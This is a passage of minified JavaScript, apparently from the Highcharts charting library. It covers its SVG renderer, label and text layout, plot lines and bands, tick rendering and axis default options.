a=["translate("+a+","+b+")"];e?a.push("rotate(90) scale(-1,1)"):f&&a.push("rotate("+f+" "+(g.getAttribute("x")||0)+" "+(g.getAttribute("y")||0)+")");(u(c)||u(d))&&a.push("scale("+r(c,1)+" "+r(d,1)+")");a.length&&g.setAttribute("transform",a.join(" "))},toFront:function(){var a=this.element;a.parentNode.appendChild(a);return this},align:function(a,b,c){var d,e,f,g,h={};e=this.renderer;f=e.alignedObjects;if(a){if(this.alignOptions=a,this.alignByTranslate=b,!c||U(c))this.alignTo=d=c||"renderer",oa(f,
this),f.push(this),c=null}else a=this.alignOptions,b=this.alignByTranslate,d=this.alignTo;c=r(c,e[d],e);d=a.align;e=a.verticalAlign;f=(c.x||0)+(a.x||0);g=(c.y||0)+(a.y||0);if("right"===d||"center"===d)f+=(c.width-(a.width||0))/{right:1,center:2}[d];h[b?"translateX":"x"]=z(f);if("bottom"===e||"middle"===e)g+=(c.height-(a.height||0))/({bottom:1,middle:2}[e]||1);h[b?"translateY":"y"]=z(g);this[this.placed?"animate":"attr"](h);this.placed=!0;this.alignAttr=h;return this},getBBox:function(){var a=this.bBox,
b=this.renderer,c,d,e=this.rotation;c=this.element;var f=this.styles,g=e*Ab;d=this.textStr;var h;if(""===d||Mb.test(d))h="num."+d.toString().length+(f?"|"+f.fontSize+"|"+f.fontFamily:"");h&&(a=b.cache[h]);if(!a){if(c.namespaceURI===ja||b.forExport){try{a=c.getBBox?t({},c.getBBox()):{width:c.offsetWidth,height:c.offsetHeight}}catch(k){}if(!a||0>a.width)a={width:0,height:0}}else a=this.htmlGetBBox();b.isSVG&&(c=a.width,d=a.height,pa&&f&&"11px"===f.fontSize&&"16.9"===d.toPrecision(3)&&(a.height=d=14),
e&&(a.width=R(d*Ra(g))+R(c*Fa(g)),a.height=R(d*Fa(g))+R(c*Ra(g))));this.bBox=a;h&&(b.cache[h]=a)}return a},show:function(a){return a&&this.element.namespaceURI===ja?(this.element.removeAttribute("visibility"),this):this.attr({visibility:a?"inherit":"visible"})},hide:function(){return this.attr({visibility:"hidden"})},fadeOut:function(a){var b=this;b.animate({opacity:0},{duration:a||150,complete:function(){b.hide()}})},add:function(a){var b=this.renderer,c=a||b,d=c.element||b.box,e=this.element,f=
this.zIndex,g,h;a&&(this.parentGroup=a);this.parentInverted=a&&a.inverted;void 0!==this.textStr&&b.buildText(this);f&&(c.handleZ=!0,f=A(f));if(c.handleZ)for(a=d.childNodes,g=0;g<a.length;g++)if(b=a[g],c=G(b,"zIndex"),b!==e&&(A(c)>f||!u(f)&&u(c))){d.insertBefore(e,b);h=!0;break}h||d.appendChild(e);this.added=!0;if(this.onAdd)this.onAdd();return this},safeRemoveChild:function(a){var b=a.parentNode;b&&b.removeChild(a)},destroy:function(){var a=this,b=a.element||{},c=a.shadows,d=a.renderer.isSVG&&"SPAN"===
b.nodeName&&a.parentGroup,e,f;b.onclick=b.onmouseout=b.onmouseover=b.onmousemove=b.point=null;Ya(a);a.clipPath&&(a.clipPath=a.clipPath.destroy());if(a.stops){for(f=0;f<a.stops.length;f++)a.stops[f]=a.stops[f].destroy();a.stops=null}a.safeRemoveChild(b);for(c&&s(c,function(b){a.safeRemoveChild(b)});d&&0===d.div.childNodes.length;)b=d.parentGroup,a.safeRemoveChild(d.div),delete d.div,d=b;a.alignTo&&oa(a.renderer.alignedObjects,a);for(e in a)delete a[e];return null},shadow:function(a,b,c){var d=[],e,
f,g=this.element,h,k,l,m;if(a){k=r(a.width,3);l=(a.opacity||0.15)/k;m=this.parentInverted?"(-1,-1)":"("+r(a.offsetX,1)+", "+r(a.offsetY,1)+")";for(e=1;e<=k;e++)f=g.cloneNode(0),h=2*k+1-2*e,G(f,{isShadow:"true",stroke:a.color||"black","stroke-opacity":l*e,"stroke-width":h,transform:"translate"+m,fill:ca}),c&&(G(f,"height",x(G(f,"height")-h,0)),f.cutHeight=h),b?b.element.appendChild(f):g.parentNode.insertBefore(f,g),d.push(f);this.shadows=d}return this},xGetter:function(a){"circle"===this.element.nodeName&&
(a={x:"cx",y:"cy"}[a]||a);return this._defaultGetter(a)},_defaultGetter:function(a){a=r(this[a],this.element?this.element.getAttribute(a):null,0);/^[0-9\.]+$/.test(a)&&(a=parseFloat(a));return a},dSetter:function(a,b,c){a&&a.join&&(a=a.join(" "));/(NaN| {2}|^$)/.test(a)&&(a="M 0 0");c.setAttribute(b,a);this[b]=a},dashstyleSetter:function(a){var b;if(a=a&&a.toLowerCase()){a=a.replace("shortdashdotdot","3,1,1,1,1,1,").replace("shortdashdot","3,1,1,1").replace("shortdot","1,1,").replace("shortdash",
"3,1,").replace("longdash","8,3,").replace(/dot/g,"1,3,").replace("dash","4,3,").replace(/,$/,"").split(",");for(b=a.length;b--;)a[b]=A(a[b])*this.element.getAttribute("stroke-width");a=a.join(",");this.element.setAttribute("stroke-dasharray",a)}},alignSetter:function(a){this.element.setAttribute("text-anchor",{left:"start",center:"middle",right:"end"}[a])},opacitySetter:function(a,b,c){this[b]=a;c.setAttribute(b,a)},"stroke-widthSetter":function(a,b,c){0===a&&(a=1E-5);this.strokeWidth=a;c.setAttribute(b,
a)},titleSetter:function(a){var b=this.element.getElementsByTagName("title")[0];b||(b=y.createElementNS(ja,"title"),this.element.appendChild(b));b.textContent=a},textSetter:function(a){a!==this.textStr&&(delete this.bBox,this.textStr=a,this.added&&this.renderer.buildText(this))},fillSetter:function(a,b,c){"string"===typeof a?c.setAttribute(b,a):a&&this.colorGradient(a,b,c)},zIndexSetter:function(a,b,c){c.setAttribute(b,a);this[b]=a},_defaultSetter:function(a,b,c){c.setAttribute(b,a)}};W.prototype.yGetter=
W.prototype.xGetter;W.prototype.translateXSetter=W.prototype.translateYSetter=W.prototype.rotationSetter=W.prototype.verticalAlignSetter=W.prototype.scaleXSetter=W.prototype.scaleYSetter=function(a,b){this[b]=a;this.doTransform=!0};W.prototype.strokeSetter=W.prototype.fillSetter;var Za=function(){this.init.apply(this,arguments)};Za.prototype={Element:W,init:function(a,b,c,d,e){var f=location,g;d=this.createElement("svg").attr({version:"1.1"}).css(this.getStyle(d));g=d.element;a.appendChild(g);-1===
a.innerHTML.indexOf("xmlns")&&G(g,"xmlns",ja);this.isSVG=!0;this.box=g;this.boxWrapper=d;this.alignedObjects=[];this.url=(Sa||Bb)&&y.getElementsByTagName("base").length?f.href.replace(/#.*?$/,"").replace(/([\('\)])/g,"\\$1").replace(/ /g,"%20"):"";this.createElement("desc").add().element.appendChild(y.createTextNode("Created with @product.name@ @product.version@"));this.defs=this.createElement("defs").add();this.forExport=e;this.gradients={};this.cache={};this.setSize(b,c,!1);var h;Sa&&a.getBoundingClientRect&&
(this.subPixelFix=b=function(){X(a,{left:0,top:0});h=a.getBoundingClientRect();X(a,{left:ya(h.left)-h.left+"px",top:ya(h.top)-h.top+"px"})},b(),N(O,"resize",b))},getStyle:function(a){return this.style=t({fontFamily:'"Lucida Grande", "Lucida Sans Unicode", Arial, Helvetica, sans-serif',fontSize:"12px"},a)},isHidden:function(){return!this.boxWrapper.getBBox().width},destroy:function(){var a=this.defs;this.box=null;this.boxWrapper=this.boxWrapper.destroy();Da(this.gradients||{});this.gradients=null;
a&&(this.defs=a.destroy());this.subPixelFix&&T(O,"resize",this.subPixelFix);return this.alignedObjects=null},createElement:function(a){var b=new this.Element;b.init(this,a);return b},draw:function(){},buildText:function(a){for(var b=a.element,c=this,d=c.forExport,e=r(a.textStr,"").toString(),f=-1!==e.indexOf("<"),g=b.childNodes,h,k,l=G(b,"x"),m=a.styles,n=a.textWidth,q=m&&m.lineHeight,p=g.length,w=function(a){return q?A(q):c.fontMetrics(/(px|em)$/.test(a&&a.style.fontSize)?a.style.fontSize:m&&m.fontSize||
c.style.fontSize||12).h};p--;)b.removeChild(g[p]);f||-1!==e.indexOf(" ")?(h=/<.*style="([^"]+)".*>/,k=/<.*href="(http[^"]+)".*>/,n&&!a.added&&this.box.appendChild(b),e=f?e.replace(/<(b|strong)>/g,'<span style="font-weight:bold">').replace(/<(i|em)>/g,'<span style="font-style:italic">').replace(/<a/g,"<span").replace(/<\/(b|strong|i|em|a)>/g,"</span>").split(/<br.*?>/g):[e],""===e[e.length-1]&&e.pop(),s(e,function(e,f){var g,p=0;e=e.replace(/<span/g,"|||<span").replace(/<\/span>/g,"</span>|||");g=
e.split("|||");s(g,function(e){if(""!==e||1===g.length){var q={},r=y.createElementNS(ja,"tspan"),s;h.test(e)&&(s=e.match(h)[1].replace(/(;| |^)color([ :])/,"$1fill$2"),G(r,"style",s));k.test(e)&&!d&&(G(r,"onclick",'location.href="'+e.match(k)[1]+'"'),X(r,{cursor:"pointer"}));e=(e.replace(/<(.|\n)*?>/g,"")||" ").replace(/</g,"<").replace(/>/g,">");if(" "!==e&&(r.appendChild(y.createTextNode(e)),p?q.dx=0:f&&null!==l&&(q.x=l),G(r,q),!p&&f&&(!ba&&d&&X(r,{display:"block"}),G(r,"dy",w(r),Bb&&r.offsetHeight)),
b.appendChild(r),p++,n)){e=e.replace(/([^\^])-/g,"$1- ").split(" ");for(var q=1<e.length&&"nowrap"!==m.whiteSpace,ob,u,D=a._clipHeight,x=[],v=w(),t=1;q&&(e.length||x.length);)delete a.bBox,ob=a.getBBox(),u=ob.width,!ba&&c.forExport&&(u=c.measureSpanWidth(r.firstChild.data,a.styles)),(ob=u>n)&&1!==e.length?(r.removeChild(r.firstChild),x.unshift(e.pop())):(e=x,x=[],e.length&&(t++,D&&t*v>D?(e=["..."],a.attr("title",a.textStr)):(r=y.createElementNS(ja,"tspan"),G(r,{dy:v,x:l}),s&&G(r,"style",s),b.appendChild(r),
u>n&&(n=u)))),e.length&&r.appendChild(y.createTextNode(e.join(" ").replace(/- /g,"-")))}}})})):b.appendChild(y.createTextNode(e))},button:function(a,b,c,d,e,f,g,h,k){var l=this.label(a,b,c,k,null,null,null,null,"button"),m=0,n,q,p,w,r,s;a={x1:0,y1:0,x2:0,y2:1};e=E({"stroke-width":1,stroke:"#CCCCCC",fill:{linearGradient:a,stops:[[0,"#FEFEFE"],[1,"#F6F6F6"]]},r:2,padding:5,style:{color:"black"}},e);p=e.style;delete e.style;f=E(e,{stroke:"#68A",fill:{linearGradient:a,stops:[[0,"#FFF"],[1,"#ACF"]]}},
f);w=f.style;delete f.style;g=E(e,{stroke:"#68A",fill:{linearGradient:a,stops:[[0,"#9BD"],[1,"#CDF"]]}},g);r=g.style;delete g.style;h=E(e,{style:{color:"#CCC"}},h);s=h.style;delete h.style;N(l.element,pa?"mouseover":"mouseenter",function(){3!==m&&l.attr(f).css(w)});N(l.element,pa?"mouseout":"mouseleave",function(){3!==m&&(n=[e,f,g][m],q=[p,w,r][m],l.attr(n).css(q))});l.setState=function(a){(l.state=m=a)?2===a?l.attr(g).css(r):3===a&&l.attr(h).css(s):l.attr(e).css(p)};return l.on("click",function(){3!==
m&&d.call(l)}).attr(e).css(t({cursor:"default"},p))},crispLine:function(a,b){a[1]===a[4]&&(a[1]=a[4]=z(a[1])-b%2/2);a[2]===a[5]&&(a[2]=a[5]=z(a[2])+b%2/2);return a},path:function(a){var b={fill:ca};ka(a)?b.d=a:V(a)&&t(b,a);return this.createElement("path").attr(b)},circle:function(a,b,c){a=V(a)?a:{x:a,y:b,r:c};b=this.createElement("circle");b.xSetter=function(a){this.element.setAttribute("cx",a)};b.ySetter=function(a){this.element.setAttribute("cy",a)};return b.attr(a)},arc:function(a,b,c,d,e,f){V(a)&&
(b=a.y,c=a.r,d=a.innerR,e=a.start,f=a.end,a=a.x);a=this.symbol("arc",a||0,b||0,c||0,c||0,{innerR:d||0,start:e||0,end:f||0});a.r=c;return a},rect:function(a,b,c,d,e,f){e=V(a)?a.r:e;var g=this.createElement("rect");a=V(a)?a:a===v?{}:{x:a,y:b,width:x(c,0),height:x(d,0)};f!==v&&(a.strokeWidth=f,a=g.crisp(a));e&&(a.r=e);g.rSetter=function(a){G(this.element,{rx:a,ry:a})};return g.attr(a)},setSize:function(a,b,c){var d=this.alignedObjects,e=d.length;this.width=a;this.height=b;for(this.boxWrapper[r(c,!0)?
"animate":"attr"]({width:a,height:b});e--;)d[e].align()},g:function(a){var b=this.createElement("g");return u(a)?b.attr({"class":"highcharts-"+a}):b},image:function(a,b,c,d,e){var f={preserveAspectRatio:ca};1<arguments.length&&t(f,{x:b,y:c,width:d,height:e});f=this.createElement("image").attr(f);f.element.setAttributeNS?f.element.setAttributeNS("http://www.w3.org/1999/xlink","href",a):f.element.setAttribute("hc-svg-href",a);return f},symbol:function(a,b,c,d,e,f){var g,h=this.symbols[a],h=h&&h(z(b),
z(c),d,e,f),k=/^url\((.*?)\)$/,l,m;h?(g=this.path(h),t(g,{symbolName:a,x:b,y:c,width:d,height:e}),f&&t(g,f)):k.test(a)&&(m=function(a,b){a.element&&(a.attr({width:b[0],height:b[1]}),a.alignByTranslate||a.translate(z((d-b[0])/2),z((e-b[1])/2)))},l=a.match(k)[1],a=Db[l],g=this.image(l).attr({x:b,y:c}),g.isImg=!0,a?m(g,a):(g.attr({width:0,height:0}),ta("img",{onload:function(){m(g,Db[l]=[this.width,this.height])},src:l})));return g},symbols:{circle:function(a,b,c,d){var e=0.166*c;return["M",a+c/2,b,
"C",a+c+e,b,a+c+e,b+d,a+c/2,b+d,"C",a-e,b+d,a-e,b,a+c/2,b,"Z"]},square:function(a,b,c,d){return["M",a,b,"L",a+c,b,a+c,b+d,a,b+d,"Z"]},triangle:function(a,b,c,d){return["M",a+c/2,b,"L",a+c,b+d,a,b+d,"Z"]},"triangle-down":function(a,b,c,d){return["M",a,b,"L",a+c,b,a+c/2,b+d,"Z"]},diamond:function(a,b,c,d){return["M",a+c/2,b,"L",a+c,b+d/2,a+c/2,b+d,a,b+d/2,"Z"]},arc:function(a,b,c,d,e){var f=e.start;c=e.r||c||d;var g=e.end-0.001;d=e.innerR;var h=e.open,k=Fa(f),l=Ra(f),m=Fa(g),g=Ra(g);e=e.end-f<zb?0:
1;return["M",a+c*k,b+c*l,"A",c,c,0,e,1,a+c*m,b+c*g,h?"M":"L",a+d*m,b+d*g,"A",d,d,0,e,0,a+d*k,b+d*l,h?"":"Z"]},callout:function(a,b,c,d,e){var f=J(e&&e.r||0,c,d),g=f+6,h=e&&e.anchorX,k=e&&e.anchorY;e=z(e.strokeWidth||0)%2/2;a+=e;b+=e;e=["M",a+f,b,"L",a+c-f,b,"C",a+c,b,a+c,b,a+c,b+f,"L",a+c,b+d-f,"C",a+c,b+d,a+c,b+d,a+c-f,b+d,"L",a+f,b+d,"C",a,b+d,a,b+d,a,b+d-f,"L",a,b+f,"C",a,b,a,b,a+f,b];h&&h>c&&k>b+g&&k<b+d-g?e.splice(13,3,"L",a+c,k-6,a+c+6,k,a+c,k+6,a+c,b+d-f):h&&0>h&&k>b+g&&k<b+d-g?e.splice(33,
3,"L",a,k+6,a-6,k,a,k-6,a,b+f):k&&k>d&&h>a+g&&h<a+c-g?e.splice(23,3,"L",h+6,b+d,h,b+d+6,h-6,b+d,a+f,b+d):k&&0>k&&h>a+g&&h<a+c-g&&e.splice(3,3,"L",h-6,b,h,b-6,h+6,b,c-f,b);return e}},clipRect:function(a,b,c,d){var e="highcharts-"+kb++,f=this.createElement("clipPath").attr({id:e}).add(this.defs);a=this.rect(a,b,c,d,0).add(f);a.id=e;a.clipPath=f;return a},text:function(a,b,c,d){var e=da||!ba&&this.forExport,f={};if(d&&!this.forExport)return this.html(a,b,c);f.x=Math.round(b||0);c&&(f.y=Math.round(c));
if(a||0===a)f.text=a;a=this.createElement("text").attr(f);e&&a.css({position:"absolute"});d||(a.xSetter=function(a,b,c){var d=c.childNodes,e,f;for(f=1;f<d.length;f++)e=d[f],e.getAttribute("x")===c.getAttribute("x")&&e.setAttribute("x",a);c.setAttribute(b,a)});return a},fontMetrics:function(a){a=a||this.style.fontSize;a=/px/.test(a)?A(a):/em/.test(a)?12*parseFloat(a):12;a=24>a?a+4:z(1.2*a);var b=z(0.8*a);return{h:a,b:b}},label:function(a,b,c,d,e,f,g,h,k){function l(){var a,b;a=w.element.style;P=(void 0===
Ba||void 0===pb||p.styles.textAlign)&&w.textStr&&w.getBBox();p.width=(Ba||P.width||0)+2*K+x;p.height=(pb||P.height||0)+2*K;Ia=K+q.fontMetrics(a&&a.fontSize).b;y&&(r||(a=z(-na*K),b=h?-Ia:0,p.box=r=d?q.symbol(d,a,b,p.width,p.height,D):q.rect(a,b,p.width,p.height,0,D[Nb]),r.attr("fill",ca).add(p)),r.isImg||r.attr(t({width:z(p.width),height:z(p.height)},D)),D=null)}function m(){var a=p.styles,a=a&&a.textAlign,b=x+K*(1-na),c;c=h?0:Ia;u(Ba)&&P&&("center"===a||"right"===a)&&(b+={center:0.5,right:1}[a]*(Ba-
P.width));if(b!==w.x||c!==w.y)w.attr("x",b),c!==v&&w.attr("y",c);w.x=b;w.y=c}function n(a,b){r?r.attr(a,b):D[a]=b}var q=this,p=q.g(k),w=q.text("",0,0,g).attr({zIndex:1}),r,P,na=0,K=3,x=0,Ba,pb,qb,H,Fb=0,D={},Ia,y;p.onAdd=function(){w.add(p);p.attr({text:a||"",x:b,y:c});r&&u(e)&&p.attr({anchorX:e,anchorY:f})};p.widthSetter=function(a){Ba=a};p.heightSetter=function(a){pb=a};p.paddingSetter=function(a){u(a)&&a!==K&&(K=a,m())};p.paddingLeftSetter=function(a){u(a)&&a!==x&&(x=a,m())};p.alignSetter=function(a){na=
{left:0,center:0.5,right:1}[a]};p.textSetter=function(a){a!==v&&w.textSetter(a);l();m()};p["stroke-widthSetter"]=function(a,b){a&&(y=!0);Fb=a%2/2;n(b,a)};p.strokeSetter=p.fillSetter=p.rSetter=function(a,b){"fill"===b&&a&&(y=!0);n(b,a)};p.anchorXSetter=function(a,b){e=a;n(b,a+Fb-qb)};p.anchorYSetter=function(a,b){f=a;n(b,a-H)};p.xSetter=function(a){p.x=a;na&&(a-=na*((Ba||P.width)+K));qb=z(a);p.attr("translateX",qb)};p.ySetter=function(a){H=p.y=z(a);p.attr("translateY",H)};var B=p.css;return t(p,{css:function(a){if(a){var b=
{};a=E(a);s("fontSize fontWeight fontFamily color lineHeight width textDecoration textShadow".split(" "),function(c){a[c]!==v&&(b[c]=a[c],delete a[c])});w.css(b)}return B.call(p,a)},getBBox:function(){return{width:P.width+2*K,height:P.height+2*K,x:P.x-K,y:P.y-K}},shadow:function(a){r&&r.shadow(a);return p},destroy:function(){T(p.element,"mouseenter");T(p.element,"mouseleave");w&&(w=w.destroy());r&&(r=r.destroy());W.prototype.destroy.call(p);p=q=l=m=n=null}})}};Ta=Za;var rb,Gb;da&&(S.CanVGRenderer=
rb=function(){ja="http://www.w3.org/1999/xhtml"},rb.prototype.symbols={},Gb=function(){function a(){var a=b.length,d;for(d=0;d<a;d++)b[d]();b=[]}var b=[];return{push:function(c,d){0===b.length&&Ob(d,a);b.push(c)}}}(),Ta=rb);xa.prototype={addLabel:function(){var a=this.axis,b=a.options,c=a.chart,d=a.horiz,e=a.categories,f=a.names,g=this.pos,h=b.labels,k=a.tickPositions,d=d&&e&&!h.step&&!h.staggerLines&&!h.rotation&&c.plotWidth/k.length||!d&&(c.margin[3]||0.33*c.chartWidth),l=g===k[0],m=g===k[k.length-
1],n,f=e?r(e[g],f[g],g):g,e=this.label,q=k.info;a.isDatetimeAxis&&q&&(n=b.dateTimeLabelFormats[q.higherRanks[g]||q.unitName]);this.isFirst=l;this.isLast=m;b=a.labelFormatter.call({axis:a,chart:c,isFirst:l,isLast:m,dateTimeLabelFormat:n,value:a.isLog?ia(L(f)):f});g=d&&{width:x(1,z(d-2*(h.padding||10)))+"px"};g=t(g,h.style);u(e)?e&&e.attr({text:b}).css(g):(n={align:a.labelAlign},$(h.rotation)&&(n.rotation=h.rotation),d&&h.ellipsis&&(n._clipHeight=a.len/k.length),this.label=u(b)&&h.enabled?c.renderer.text(b,
0,0,h.useHTML).attr(n).css(g).add(a.labelGroup):null)},getLabelSize:function(){var a=this.label,b=this.axis;return a?a.getBBox()[b.horiz?"height":"width"]:0},getLabelSides:function(){var a=this.label.getBBox(),b=this.axis,c=b.horiz,d=b.options.labels,a=c?a.width:a.height,b=c?d.x-a*{left:0,center:0.5,right:1}[b.labelAlign]:0;return[b,c?a+b:a]},handleOverflow:function(a,b){var c=!0,d=this.axis,e=this.isFirst,f=this.isLast,g=d.horiz?b.x:b.y,h=d.reversed,k=d.tickPositions,l=this.getLabelSides(),m=l[0],
l=l[1],n,q,p,w=this.label.line||0;n=d.labelEdge;q=d.justifyLabels&&(e||f);n[w]===v||g+m>n[w]?n[w]=g+l:q||(c=!1);if(q){n=(q=d.justifyToPlot)?d.pos:0;q=q?n+d.len:d.chart.chartWidth;do a+=e?1:-1,p=d.ticks[k[a]];while(k[a]&&(!p||p.label.line!==w));d=p&&p.label.xy&&p.label.xy.x+p.getLabelSides()[e?0:1];e&&!h||f&&h?g+m<n&&(g=n-m,p&&g+l>d&&(c=!1)):g+l>q&&(g=q-l,p&&g+m<d&&(c=!1));b.x=g}return c},getPosition:function(a,b,c,d){var e=this.axis,f=e.chart,g=d&&f.oldChartHeight||f.chartHeight;return{x:a?e.translate(b+
c,null,null,d)+e.transB:e.left+e.offset+(e.opposite?(d&&f.oldChartWidth||f.chartWidth)-e.right-e.left:0),y:a?g-e.bottom+e.offset-(e.opposite?e.height:0):g-e.translate(b+c,null,null,d)-e.transB}},getLabelPosition:function(a,b,c,d,e,f,g,h){var k=this.axis,l=k.transA,m=k.reversed,n=k.staggerLines,q=k.chart.renderer.fontMetrics(e.style.fontSize).b,p=e.rotation;a=a+e.x-(f&&d?f*l*(m?-1:1):0);b=b+e.y-(f&&!d?f*l*(m?1:-1):0);p&&2===k.side&&(b-=q-q*Fa(p*Ab));u(e.y)||p||(b+=q-c.getBBox().height/2);n&&(c.line=
g/(h||1)%n,b+=k.labelOffset/n*c.line);return{x:a,y:b}},getMarkPath:function(a,b,c,d,e,f){return f.crispLine(["M",a,b,"L",a+(e?0:-c),b+(e?c:0)],d)},render:function(a,b,c){var d=this.axis,e=d.options,f=d.chart.renderer,g=d.horiz,h=this.type,k=this.label,l=this.pos,m=e.labels,n=this.gridLine,q=h?h+"Grid":"grid",p=h?h+"Tick":"tick",w=e[q+"LineWidth"],s=e[q+"LineColor"],P=e[q+"LineDashStyle"],u=e[p+"Length"],q=e[p+"Width"]||0,K=e[p+"Color"],x=e[p+"Position"],p=this.mark,t=m.step,z=!0,y=d.tickmarkOffset,
H=this.getPosition(g,l,y,b),B=H.x,H=H.y,D=g&&B===d.pos+d.len||!g&&H===d.pos?-1:1;this.isActive=!0;if(w&&(l=d.getPlotLinePath(l+y,w*D,b,!0),n===v&&(n={stroke:s,"stroke-width":w},P&&(n.dashstyle=P),h||(n.zIndex=1),b&&(n.opacity=0),this.gridLine=n=w?f.path(l).attr(n).add(d.gridGroup):null),!b&&n&&l))n[this.isNew?"attr":"animate"]({d:l,opacity:c});q&&u&&("inside"===x&&(u=-u),d.opposite&&(u=-u),h=this.getMarkPath(B,H,u,q*D,g,f),p?p.animate({d:h,opacity:c}):this.mark=f.path(h).attr({stroke:K,"stroke-width":q,
opacity:c}).add(d.axisGroup));k&&!isNaN(B)&&(k.xy=H=this.getLabelPosition(B,H,k,g,m,y,a,t),this.isFirst&&!this.isLast&&!r(e.showFirstLabel,1)||this.isLast&&!this.isFirst&&!r(e.showLastLabel,1)?z=!1:d.isRadial||m.step||m.rotation||b||0===c||(z=this.handleOverflow(a,H)),t&&a%t&&(z=!1),z&&!isNaN(H.y)?(H.opacity=c,k[this.isNew?"attr":"animate"](H),this.isNew=!1):k.attr("y",-9999))},destroy:function(){Da(this,this.axis)}};S.PlotLineOrBand=function(a,b){this.axis=a;b&&(this.options=b,this.id=b.id)};S.PlotLineOrBand.prototype=
{render:function(){var a=this,b=a.axis,c=b.horiz,d=(b.pointRange||0)/2,e=a.options,f=e.label,g=a.label,h=e.width,k=e.to,l=e.from,m=u(l)&&u(k),n=e.value,q=e.dashStyle,p=a.svgElem,w=[],s,P=e.color,t=e.zIndex,K=e.events,v={},z=b.chart.renderer;b.isLog&&(l=aa(l),k=aa(k),n=aa(n));if(h)w=b.getPlotLinePath(n,h),v={stroke:P,"stroke-width":h},q&&(v.dashstyle=q);else if(m)l=x(l,b.min-d),k=J(k,b.max+d),w=b.getPlotBandPath(l,k,e),P&&(v.fill=P),e.borderWidth&&(v.stroke=e.borderColor,v["stroke-width"]=e.borderWidth);
else return;u(t)&&(v.zIndex=t);if(p)w?p.animate({d:w},null,p.onGetPath):(p.hide(),p.onGetPath=function(){p.show()},g&&(a.label=g=g.destroy()));else if(w&&w.length&&(a.svgElem=p=z.path(w).attr(v).add(),K))for(s in d=function(b){p.on(b,function(c){K[b].apply(a,[c])})},K)d(s);f&&u(f.text)&&w&&w.length&&0<b.width&&0<b.height?(f=E({align:c&&m&&"center",x:c?!m&&4:10,verticalAlign:!c&&m&&"middle",y:c?m?16:10:m?6:-4,rotation:c&&!m&&90},f),g||(v={align:f.textAlign||f.align,rotation:f.rotation},u(t)&&(v.zIndex=
t),a.label=g=z.text(f.text,0,0,f.useHTML).attr(v).css(f.style).add()),b=[w[1],w[4],r(w[6],w[1])],w=[w[2],w[5],r(w[7],w[2])],c=va(b),m=va(w),g.align(f,!1,{x:c,y:m,width:la(b)-c,height:la(w)-m}),g.show()):g&&g.hide();return a},destroy:function(){oa(this.axis.plotLinesAndBands,this);delete this.axis;Da(this)}};sa.prototype={defaultOptions:{dateTimeLabelFormats:{millisecond:"%H:%M:%S.%L",second:"%H:%M:%S",minute:"%H:%M",hour:"%H:%M",day:"%e. %b",week:"%e. %b",month:"%b '%y",year:"%Y"},endOnTick:!1,gridLineColor:"#C0C0C0",
labels:nb,lineColor:"#C0D0E0",lineWidth:1,minPadding:0.01,maxPadding:0.01,minorGridLineColor:"#E0E0E0",minorGridLineWidth:1,minorTickColor:"#A0A0A0",minorTickLength:2,minorTickPosition:"outside",startOfWeek:1,startOnTick:!1,tickColor:"#C0D0E0",tickLength:10,tickmarkPlacement:"between",tickPixelInterval:100,tickPosition:"outside",tickWidth:1,title:{align:"middle",style:{color:"#707070"}},type:"linear"},defaultYAxisOptions:{endOnTick:!0,gridLineWidth:1,tickPixelInterval:72,showLastLabel:!0,labels:{x:-8,
y:3},lineWidth:0,maxPadding:0.05,minPadding:0.05,startOnTick:!0,tickWidth:0,title:{rotation:270,text:"Values"},stackLabels:{enabled:!1,formatter:function(){return qa(this.total,-1)},style:nb.style}},defaultLeftAxisOptions:{labels:{x:-15,y:null},title:{rotation:270}},defaultRightAxisOptions:{labels:{x:15,y:null},title:{rotation:90}},defaultBottomAxisOptions:{labels:{x:0,y:20},title:{rotation:0}},defaultTopAxisOptions:{labels:{x:0,y:-15},title:{rotation:0}},init:function(a,b){var c=b.isX;this.horiz=
a.inverted?!c:c;this.coll=(this.isXAxis=c)?"xAxis":"yAxis";this.opposite=b.opposite;this.side=b.side||(this.horiz?this.opposite?0:2:this.opposite?1:3);this.setOptions(b);var d=this.options,e=d.type;this.labelFormatter=d.labels.formatter||this.defaultLabelFormatter;this.userOptions=b;this.minPixelPadding=0;this.chart=a;this.reversed=d.reversed;this.zoomEnabled=!1!==d.zoomEnabled;this.categories=d.categories||"category"===e;this.names=[];this.isLog="logarithmic"===e;this.isDatetimeAxis="datetime"===
e;this.isLinked=u(d.linkedTo);this.tickmarkOffset=this.categories&&"between"===d.tickmarkPlacement?0.5:0;this.ticks={};this.labelEdge=[];this.minorTicks={};this.plotLinesAndBands=[];this.alternateBands={};this.len=0;this.minRange=this.userMinRange=d.minRange||d.maxZoom;this.range=d.range;this.offset=d.offset||0;this.stacks={};this.oldStacks={};this.min=this.max=null;this.crosshair=r(d.crosshair,ha(a.options.tooltip.crosshairs)[c?0:1],!1);var f,d=this.options.events;-1===Wa(this,a.axes)&&(c&&!this.isColorAxis?
a.axes.splice(a.xAxis.length,0,this):a.axes.push(this),a[this.coll].push(this));this.series=this.series||[];a.inverted&&c&&this.reversed===v&&(this.reversed=!0);this.removePlotLine=this.removePlotBand=this.removePlotBandOrLine;for(f in d)N(this,f,d[f]);this.isLog&&(this.val2lin=aa,this.lin2val=L)},setOptions:function(a){this.options=E(this.defaultOptions,this.isXAxis?{}:this.defaultYAxisOptions,[this.defaultTopAxisOptions,this.defaultRightAxisOptions,this.defaultBottomAxisOptions,this.defaultLeftAxisOptions][this.side],
E(I[this.coll],a))},defaultLabelFormatter:function(){var a=this.axis,b=this.value,c=a.categories,d=this.dateTimeLabelFormat,e=I.lang.numericSymbols,f=e&&e.length,g,h=a.options.labels.format,a=a.isLog?b:a.tickInterval;if(h)g=ua(h,this);else if(c)g=b;else if(d)g=Ka(d,b);else if(f&&1E3<=a)for(;f--&&g===v;)c=Math.pow(1E3,f+1),a>=c&&null!==e[f]&&(g=qa(b/c,-1)+e[f]);g===v&&(g=1E4<=R(b)?qa(b,0):qa(b,-1,v,""));return g},getSeriesExtremes:function(){var a=this,b=a.chart;a.hasVisibleSeries=!1;a.dataMin=a.dataMax=
